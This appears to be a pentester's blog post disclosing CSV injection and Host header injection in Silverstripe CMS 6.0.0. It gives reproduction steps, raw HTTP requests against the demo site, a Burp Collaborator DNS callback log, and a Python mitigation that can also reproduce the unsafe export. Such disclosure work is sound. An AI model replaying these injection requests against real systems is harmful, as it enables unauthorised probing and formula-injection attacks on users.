Saturday, 23 August 2025

Friday Fun Pentest Series - 40 - CSV Injection - silverstripecmsv6.0.0

Description

- It was noted that the application was vulnerable to CSV Injection in the "Users" functionality: a member's "First Name" that begins with a formula character is exported verbatim to the Users report CSV


CSV Injection #1:

Steps to Reproduce:
  1. Log in and visit "Security" > "Add Member", then enter the payload =30*30 in the "First Name" field and save
  2. Visit "Reports" > "Users, Groups and Permissions" > "Export as CSV"
  3. The payload is exported unescaped and is evaluated as a formula when the CSV file is opened in a spreadsheet application


// HTTP POST Request

POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm HTTP/1.1
Host: demo.silverstripe.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]
FirstName=%3D30*30&Surname=test&Email=test%40example.com&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%2Fdemo.silverstripe.org%2Fadmin%2Fsecurity


// HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]
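The export shown above writes the member's first name into the CSV exactly as submitted. The following is an added example (not Silverstripe's code) of the usual mitigation for a CSV export: any cell that starts with a formula trigger character is prefixed with a single quote, so a spreadsheet displays it as text instead of evaluating it. The `export_members_csv` function and the `SAMPLE_MEMBERS` records are constructed for this illustration; `neutralize=False` reproduces the unsafe behaviour described in the post.

```python
import csv
import io

# Characters that make spreadsheet applications treat a cell as a formula
# (the commonly cited CSV-injection trigger list: =, +, -, @, tab and CR).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_csv_cell(value):
    """Return `value` made safe for a CSV export.

    A leading formula trigger is prefixed with a single quote so that the
    spreadsheet shows the text literally. Embedded double quotes are escaped
    by the csv writer in export_members_csv. Note that genuine numeric fields
    such as "-5" would also be prefixed, so apply this to text columns only.
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_members_csv(members, neutralize=True):
    """Render member records (dicts with FirstName, Surname, Email) as CSV.

    neutralize=False writes user-supplied fields verbatim, which is the
    vulnerable behaviour: "=30*30" is exported as a live formula.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["FirstName", "Surname", "Email"])
    for m in members:
        row = [m.get("FirstName"), m.get("Surname"), m.get("Email")]
        if neutralize:
            row = [neutralize_csv_cell(c) for c in row]
        writer.writerow(row)
    return buf.getvalue()


# Constructed sample: the member created in the reproduction steps above,
# plus one ordinary record to show that normal values are left untouched.
SAMPLE_MEMBERS = [
    {"FirstName": "=30*30", "Surname": "test", "Email": "test@example.com"},
    {"FirstName": "Alice", "Surname": "Smith", "Email": "alice@example.com"},
]

if __name__ == "__main__":
    print(export_members_csv(SAMPLE_MEMBERS, neutralize=False))  # unsafe export
    print(export_members_csv(SAMPLE_MEMBERS))                    # hardened export
```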





Friday Fun Pentest Series - 39 - Host Header Injection - silverstripecmsv6.0.0

Description

- It was noted that the application was vulnerable to Host Header Injection on the login page: a login request carrying an attacker-controlled Host header caused an outbound DNS lookup for that host


Host Header Injection #1:

Steps to Reproduce:

  1. Submit the login form with the Host header changed to a Burp Collaborator domain
  2. Upon logging in, Collaborator receives a DNS lookup from the application's IP address

// HTTP POST Request

POST /Security/login/default/LoginForm HTTP/1.1
Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
[...]

AuthenticationMethod=SilverStripe%5CSecurity%5CMemberAuthenticator%5CMemberAuthenticator&Email=admin&Password=password&SecurityID=5afbb1fab346375510939ba7b65499e556b0251c&action_doLogin=Log+in


// HTTP Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Cache-Control: no-cache, no-store
[...]

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=27&xinfo=1014-115438578-0%200NNN%20RT%281755353110306%2067%29%20q%280%20-1%20-1%20-1%29%20r%284%20-1%29&incident_id=0-468567604813498382&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-468567604813498382</iframe></body></html>


// Burp Collab domain hit

The Collaborator server received a DNS lookup of type CNAME for the domain name www.7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com.
The lookup was received from IP address 149.126.76.44:7396 at 2025-Aug-16 14:05:10.562 UTC.